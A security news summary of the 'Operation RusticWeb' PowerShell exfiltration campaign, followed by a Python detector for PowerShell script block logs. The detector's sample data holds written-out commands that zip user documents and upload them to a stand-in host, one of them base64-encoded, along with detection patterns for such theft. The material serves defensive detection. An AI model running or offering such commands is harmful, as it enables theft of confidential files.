Operation RusticWeb Using PowerShell Commands to Exfiltrate Confidential Documents

Hackers use PowerShell commands because they provide a powerful scripting environment on Windows systems, allowing them to stealthily execute malicious scripts and commands; the campaign described here has been named Operation RusticWeb. Beyond that, PowerShell's capabilities make it an attractive tool for:

- Gaining unauthorized access
- Performing reconnaissance
- Executing various cyber attacks

Cybersecurity researchers at SEQRITE Labs recently identified Operation RusticWeb, in which they found threat actors using PowerShell commands to exfiltrate confidential documents.

RusticWeb Using PowerShell

Operation RusticWeb shows tactics overlapping with Pakistan-linked APT groups such as:

- APT36
- SideCopy

At the same time, threat actors are shifting from compiled languages to the following languages, chosen for cross-compatibility and evasion:

- Golang
- Rust
- Nim

Golang malware examples include the Windows-based Warp, which uses a Telegram bot for C2, and a Linux-based Ares RAT stager payload.
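The report above describes PowerShell being used to collect and exfiltrate documents, but gives no detection guidance. The following is an added example, not code from the original article or from SEQRITE Labs: a small Python scanner that runs over PowerShell script block log entries (the kind Windows records as Event ID 4104 when script block logging is enabled), decodes any `-EncodedCommand` payloads, and flags a block only when it combines document collection or archiving with an HTTP upload. The sample log entries, the hypothetical `example.invalid` host and the indicator patterns are all constructed for this example and are not indicators from the RusticWeb campaign.

```python
import base64
import re

# Indicator patterns (assumed, illustrative; tune for your environment).
INDICATORS = {
    # Recursive enumeration of office/PDF documents
    "document_enumeration": re.compile(
        r"Get-ChildItem\b.*?\*\.(?:docx?|xlsx?|pptx?|pdf)", re.I | re.S),
    # Staging collected files into an archive
    "archiving": re.compile(
        r"\b(?:Compress-Archive|\[System\.IO\.Compression\.ZipFile\])", re.I),
    # Cmdlet-based HTTP upload (POST body or -InFile)
    "http_upload": re.compile(
        r"\b(?:Invoke-RestMethod|Invoke-WebRequest)\b.*?-(?:Method\s+Post|InFile)\b",
        re.I | re.S),
    # .NET WebClient upload methods
    "webclient_upload": re.compile(r"\.(?:UploadFile|UploadData|UploadString)\(", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 argument
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def to_encoded_command(script: str) -> str:
    """Build the argument PowerShell expects for -EncodedCommand: base64 of UTF-16LE.
    Used here only to construct sample log data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str):
    """Reverse of to_encoded_command; returns None if the argument is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script_block(text: str) -> dict:
    """Return a dict of indicator name -> bool for one script block.
    Encoded payloads are decoded and rescanned so obfuscation does not hide them."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hits["encoded_command"] = False
    for match in ENCODED.finditer(text):
        decoded = decode_encoded_command(match.group(1))
        if decoded:
            hits["encoded_command"] = True
            for name, rx in INDICATORS.items():
                hits[name] = hits[name] or bool(rx.search(decoded))
    return hits


def is_suspected_exfiltration(hits: dict) -> bool:
    """Flag only the combination: something collected AND something uploaded."""
    collection = hits["document_enumeration"] or hits["archiving"]
    upload = hits["http_upload"] or hits["webclient_upload"]
    return collection and upload


def scan_script_blocks(blocks):
    """Return [(index, [sorted indicator names])] for every block that looks like exfiltration."""
    findings = []
    for idx, block in enumerate(blocks):
        hits = analyze_script_block(block)
        if is_suspected_exfiltration(hits):
            findings.append((idx, sorted(k for k, v in hits.items() if v)))
    return findings


# Constructed sample script block contents (not real campaign logs).
SAMPLE_SCRIPT_BLOCKS = [
    # 0: benign log cleanup
    "Get-ChildItem -Path C:\\Logs -Filter *.log | Remove-Item",
    # 1: collect documents, zip them, POST the archive
    "Get-ChildItem -Path $env:USERPROFILE\\Documents -Recurse -Include *.docx,*.pdf | "
    "Compress-Archive -DestinationPath $env:TEMP\\out.zip; "
    "Invoke-RestMethod -Uri http://example.invalid/upload -Method Post -InFile $env:TEMP\\out.zip",
    # 2: the same behaviour hidden behind -enc
    "powershell.exe -NoProfile -enc " + to_encoded_command(
        "Get-ChildItem $env:USERPROFILE -Recurse -Include *.pdf | "
        "Compress-Archive -DestinationPath $env:TEMP\\a.zip; "
        "(New-Object Net.WebClient).UploadFile('http://example.invalid/u', \"$env:TEMP\\a.zip\")"),
    # 3: benign download, no collection and no upload
    "Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile tool.zip",
]


if __name__ == "__main__":
    for idx, names in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: suspected exfiltration ({', '.join(names)})")
```

Requiring both a collection and an upload indicator in the same script block keeps ordinary administrative downloads and file cleanup out of the alert queue; decoding `-EncodedCommand` before matching is what makes block 2 visible at all.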

Source: GBHackers
